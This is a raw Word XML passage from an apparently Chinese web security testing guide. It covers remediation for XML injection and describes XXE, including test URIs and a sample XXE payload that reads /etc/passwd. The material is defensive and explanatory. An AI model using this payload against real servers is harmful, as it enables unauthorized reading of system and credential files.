      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等协议，攻击者可以在</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件中声明</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URI</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>指向服务器本地的实体造成攻击。实体攻击可导致信息泄露、任意文件读取、</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>DOS</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击和代码执行等问题。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D88F19" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="00CA437D" w:rsidRDefault="001A7A0B" w:rsidP="00CA437D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>风险等级：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69F67B82" w14:textId="0735A983" w:rsidR="001A7A0B" w:rsidRPr="00CA437D" w:rsidRDefault="00D12DCD" w:rsidP="00CA437D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>高危</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：额外数据字段注入导致权限提升或原始数据修改</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D942A8D" w14:textId="402FA5F8" w:rsidR="002A4913" w:rsidRPr="00CA437D" w:rsidRDefault="002A4913" w:rsidP="00CA437D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>【</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>中危</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:color w:val="FFC000"/>
        </w:rPr>
        <w:t>】</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：批量数据提交并成功被解析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FED2ABB" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="00CA437D" w:rsidRDefault="001A7A0B" w:rsidP="00CA437D">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>修复方案：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A227368" w14:textId="77777777" w:rsidR="008C710A" w:rsidRPr="00CA437D" w:rsidRDefault="008C710A" w:rsidP="00CA437D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>严格检查用户输入的字符；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26B22ED4" w14:textId="77777777" w:rsidR="008C710A" w:rsidRPr="00CA437D" w:rsidRDefault="008C710A" w:rsidP="00CA437D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>检查</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>使用的底层</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>解析库，使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言提供的禁用外部实体的方法：</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Document</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>BuilderFactory dbf =DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false)</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CBB50E3" w14:textId="77777777" w:rsidR="008C710A" w:rsidRPr="00CA437D" w:rsidRDefault="008C710A" w:rsidP="00CA437D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="88"/>
        </w:numPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>操作</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA437D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>时对格式字符进行转义处理，常见的格式字符如下表：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af2"/>
        <w:tblW w:w="0" w:type="auto"/>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4151"/>
        <w:gridCol w:w="4151"/>
      </w:tblGrid>
      <w:tr w:rsidR="008C710A" w:rsidRPr="00CA437D" w14:paraId="45D56121" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="591ACE15"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lt</w:t>
            </w:r>
            <w:r w:rsidRPr="00CA437D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
              </w:rPr>
              <w:t>；</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7460EF9D"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lt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C710A" w:rsidRPr="00CA437D" w14:paraId="3BD1E356" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="25FC1C03"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gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="53CB5D94"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gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C710A" w:rsidRPr="00CA437D" w14:paraId="5886B965" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="7E0B3BA5"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amp;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="0FFC2E3E"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w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C710A" w:rsidRPr="00CA437D" w14:paraId="16E54E34" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="43832C5C"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apos;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="1A49A901"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rPr>
              <w:t>‘</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="008C710A" w:rsidRPr="00CA437D" w14:paraId="6510A784" w14:textId="77777777" w:rsidTr="00936DFE">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="75F5D543"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quot;</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4151" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F2F2F2" w:themeFill="background1" w:themeFillShade="F2"/>
          </w:tcPr>
          <w:p w14:paraId="73036A44"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rPr>
              <w:t>“</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="63F74CAE" w14:textId="3DC0BD71" w:rsidR="001A7A0B" w:rsidRPr="00F757E4" w:rsidRDefault="00B44623" w:rsidP="00B44623">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34F8E03" w14:textId="4BA2973D" w:rsidR="00210E6F" w:rsidRPr="00F757E4" w:rsidRDefault="00EC4782" w:rsidP="00210E6F">
      <w:pPr>
        <w:pStyle w:val="31"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="5"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc498434561"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="微软雅黑" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XXE</w:t>
      </w:r>
      <w:bookmarkEnd w:id="99"/>
    </w:p>
    <w:p w14:paraId="18F96E8F" w14:textId="75163E43" w:rsidR="001A7A0B" w:rsidRPr="00B33530" w:rsidRDefault="001A7A0B" w:rsidP="00B33530">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>漏洞描述：</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>外部实体攻击，利用</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&lt;!Entityname SYSTEM </w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URI</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件的解析依赖</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libxml</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>库，而</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>libxml2.9</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>以前的版本默认支持并开启了外部实体的引用，服务端解析用户提交的</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件时，未对</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>XML</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>文件引用的外部实体（含外部普通实体和外部参数实体）做合适的处理，并且实体的</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file://</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ftp://</w:t>
      </w:r>
      <w:r w:rsidR="00614863" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>等协议</w:t>
      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02FA596F" w14:textId="77777777" w:rsidR="00FE0706" w:rsidRPr="00B33530" w:rsidRDefault="001A7A0B" w:rsidP="00B33530">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>测试方法：</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通过手工篡改网站中</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>xml</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>实体中的头部，加入相关的读取文件或者是链接，或者是命令执行等，如</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>file:///path/to/file.ext</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>http://url/file.ext</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>；</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>php://filter/read=convert.base64-encode/resource=conf.php</w:t>
      </w:r>
      <w:r w:rsidR="00FE0706" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，类似如下代码所示：</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FE0706" w:rsidRPr="00B33530" w14:paraId="2B83C780" w14:textId="77777777" w:rsidTr="00936DFE">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45A5EE"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xml version="1.0" encoding="utf-8"?&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5FFB748D"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 xml:space="preserve">&lt;!DOCTYPE nsfocus-sec [  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4CB334F1"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ELEMENT methodname ANY &gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1202D4B9"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ENTITY xxe SYSTEM "file:///etc/passwd" &gt;]&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11A78883"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methodcall&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="632CD21E"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methodname&gt;&amp;xxe;&lt;/methodname&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4985C282"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methodcall&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5BBE5F09" w14:textId="77777777" w:rsidR="001A7A0B" w:rsidRPr="00B33530" w:rsidRDefault="001A7A0B" w:rsidP="00B33530">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0224ADCD" w14:textId="7789F513" w:rsidR="001A7A0B" w:rsidRPr="00B33530" w:rsidRDefault="00C24790" w:rsidP="00B33530">
      <w:pPr>
        <w:spacing w:line="300" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>风险分析</w:t>
      </w:r>
      <w:r w:rsidR="001A7A0B" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="006B70A7" w:rsidRPr="00B33530">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="宋体-简" w:hAnsi="Arial" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以在</w:t>
